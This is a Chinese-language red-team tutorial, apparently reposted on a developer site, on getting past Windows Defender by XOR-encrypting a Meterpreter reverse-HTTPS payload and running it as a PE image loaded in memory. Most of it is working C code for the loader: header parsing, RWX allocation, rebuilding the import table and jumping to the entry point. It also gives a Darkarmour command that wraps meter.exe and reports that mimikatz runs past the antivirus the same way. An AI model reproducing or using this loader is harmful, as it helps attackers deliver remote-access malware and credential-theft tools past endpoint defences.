红队技巧--通过内存中PE执行绕过AV
今天在国外看到的一个比较不错BypassAV的方法,遂分享给大家。
payload选择metasploits的windows/x64/meterpreter_reverse_https,测试AV为Windows Defender,比如以下面的文件为例进行测试。
然后就会被Windows Defender检测到,并可以通过时间查看器查看
然后我们就可以发现,我们被“HackTool:Win64/Meterpreter.A!dll”所拦截。很明显我们不能在磁盘中运行恶意文件获取会话,那么我们选择以内存的方式运行文件。
具体思路:
- 加密恶意软件并将其存储在内存中
- 解析DOS标头&
- 重新创建导入地址表
- 获取并跳转到新的入口点
加密方式我们选择多层的XOR,下面是对代码进行加密的代码:
for (i = 0; i < array_len; i++) {
decrypted_bytes[i] = keys ^ image_crypt[i];
image_crypt[i] = '\\0';
}
// repeat this for each key
for (i = 0; i < array_len; i++) {
decrypted_bytes[i] = key%s ^ decrypted_bytes[i];
}解析DOS标头时,需要一些重要的结构
- PIMAGE_DOS_HEADER
要检查恶意软件中的魔术字节,只需确保我们可以实际执行它即可。
- PIMAGE_NT_HEADERS
用于检查恶意软件的PE签名(再次确保其有效),并使用该OptionalHeader值使我们能够访问IMAGE_OPTIONAL_HEADER结构
- IMAGE_OPTIONAL_HEADER
在获取图像基本和入口点地址的同时,还要获取图像和标题的整体大小。然后,这将允许使用分配正确的内存量。
- PIMAGE_SECTION_HEADER
允许我们访问每个部分的地址,大小和数据,以便将其复制到上面分配的空间中。
下面是我们将用来完成所有这些操作的代码
LPVOID AllocateImage(LPVOID base_addr) {
LPVOID mem_image_base = NULL;
PIMAGE_DOS_HEADER raw_image_base = (PIMAGE_DOS_HEADER)base_addr;
if (IMAGE_DOS_SIGNATURE != raw_image_base->e_magic)
{
return NULL;
}
PIMAGE_NT_HEADERS nt_header = (PIMAGE_NT_HEADERS)(raw_image_base->e_lfanew + (UINT_PTR)raw_image_base);
if (IMAGE_NT_SIGNATURE != nt_header->Signature)
{
return NULL;
}
PIMAGE_SECTION_HEADER section_header = (PIMAGE_SECTION_HEADER)(raw_image_base->e_lfanew + sizeof(*nt_header) + (UINT_PTR)raw_image_base);
mem_image_base = VirtualAlloc((LPVOID)(nt_header->OptionalHeader.ImageBase), nt_header->OptionalHeader.SizeOfImage , MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (NULL == mem_image_base)
{
mem_image_base = VirtualAlloc(NULL, nt_header->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
}
if (NULL == mem_image_base)
{
return NULL;
}
memcpy(mem_image_base, (LPVOID)raw_image_base, nt_header->OptionalHeader.SizeOfHeaders);
for (int i = 0; i < nt_header->FileHeader.NumberOfSections; i++)
{
memcpy((LPVOID)(section_header->VirtualAddress + (UINT_PTR)mem_image_base), (LPVOID)(section_header->PointerToRawData + (UINT_PTR)raw_image_base), section_header->SizeOfRawData);
section_header++;
}
return mem_image_base;
}重新创建导入地址表
这次我们需要的重要结构是
- IMAGE_OPTIONAL_HEADER
我们将使用它来获取IAT(导入地址表)的地址和大小。一旦获得地址,我们将使用它VirtualProtect来将其权限更改为,PAGE_READWRITE以便进行下一步。
- PIMAGE_IMPORT_DESCRIPTOR
这用于访问包含导入地址表(用于查找DLL的内存地址的查询表,当调用其他库中的函数时可以使用的信息)信息的结构。我们将使用它来获取名称。恶意软件使用的DLL并使用该LoadLibraryA功能加载它们。将DLL加载到我们自己的地址空间后,我们需要遍历并使用它GetProcAddress来获取恶意软件所需功能的正确新地址,并在IAT中添加对其的引用。
- PIMAGE_THUNK_DATA
这将为我们提供被恶意软件调用的每个函数的名称,一旦有了这些名称,我们就可以使用GetProcAddress它们从它们所在的DLL中获取地址,然后将正确的新地址添加到IAT中。
- PIMAGE_IMPORT_BY_NAME
允许我们从地址获取函数名称
然后将所有这些放在一起...
VOID ReCreateIAT( PIMAGE_DOS_HEADER dos_header, PIMAGE_NT_HEADERS nt_header)
{
DWORD op;
DWORD iat_rva;
SIZE_T iat_size;
HMODULE import_base;
PIMAGE_THUNK_DATA thunk;
PIMAGE_THUNK_DATA fixup;
PIMAGE_IMPORT_DESCRIPTOR import_table = (PIMAGE_IMPORT_DESCRIPTOR)(nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress + (UINT_PTR)dos_header);
DWORD iat_loc = (nt_header->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT].VirtualAddress) ? IMAGE_DIRECTORY_ENTRY_IAT : IMAGE_DIRECTORY_ENTRY_IMPORT;
iat_rva = nt_header->OptionalHeader.DataDirectory[iat_loc].VirtualAddress;
iat_size = nt_header->OptionalHeader.DataDirectory[iat_loc].Size;
LPVOID iat = (LPVOID)(iat_rva + (UINT_PTR)dos_header);
VirtualProtect(iat, iat_size, PAGE_READWRITE, &op);
while (import_table->Name) {
import_base = LoadLibraryA((LPCSTR)(import_table->Name + (UINT_PTR)dos_header));
fixup = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header);
if (import_table->OriginalFirstThunk) {
thunk = (PIMAGE_THUNK_DATA)(import_table->OriginalFirstThunk + (UINT_PTR)dos_header);
} else {
thunk = (PIMAGE_THUNK_DATA)(import_table->FirstThunk + (UINT_PTR)dos_header);
}
while (thunk->u1.Function) {
PCHAR func_name;
if (thunk->u1.Ordinal & IMAGE_ORDINAL_FLAG64) {
fixup->u1.Function =
(UINT_PTR)GetProcAddress(import_base, (LPCSTR)(thunk->u1.Ordinal & 0xFFFF));
} else {
func_name = (PCHAR)(((PIMAGE_IMPORT_BY_NAME)(thunk->u1.AddressOfData))->Name + (UINT_PTR)dos_header);
fixup->u1.Function = (UINT_PTR)GetProcAddress(import_base, func_name);
}
fixup++;
thunk++;
}
import_table++;
}
return;
}将所有PE都设置在内存中,就可以执行它了!
我们可以使用AddressOfEntryPoint结构IMAGE_OPTIONAL_HEADER 的成员来获取入口点。这将为我们提供相对于图像基址的入口点,因此,为了获得正确的地址,我们需要将其添加到基址(将从其他函数返回AllocateImage)。如下所示
LPVOID EntryPoint = (LPVOID)(nt_header->OptionalHeader.AddressOfEntryPoint + (UINT_PTR)image_base);现在我们有了切入点,我们可以使用
((void(*)())(EntryPoint))();作者最后将所有的功能打包成了一个工具--Darkarmour,我们可以使用该工具进行上述操作,工具地址在文末。
比如执行以下操作:
./darkarmour.py -f meter.exe -j -l 5 -e xor -o darkmeter.exe
执行,并绕过了杀软
我们也尝试执行mimikatz
是的,也可以运行它:)
写在后面:
行为分析是杀软常见的检测恶意文件的方法,但它是执行后才会被检测的,这意味着绕过它的唯一方法是更改恶意软件的实际行为。
原文地址:
https://blog.dylan.codes/bypassing-av-via/工具地址:
https://git.dylan.codes/batman/darkarmour腾讯云开发者
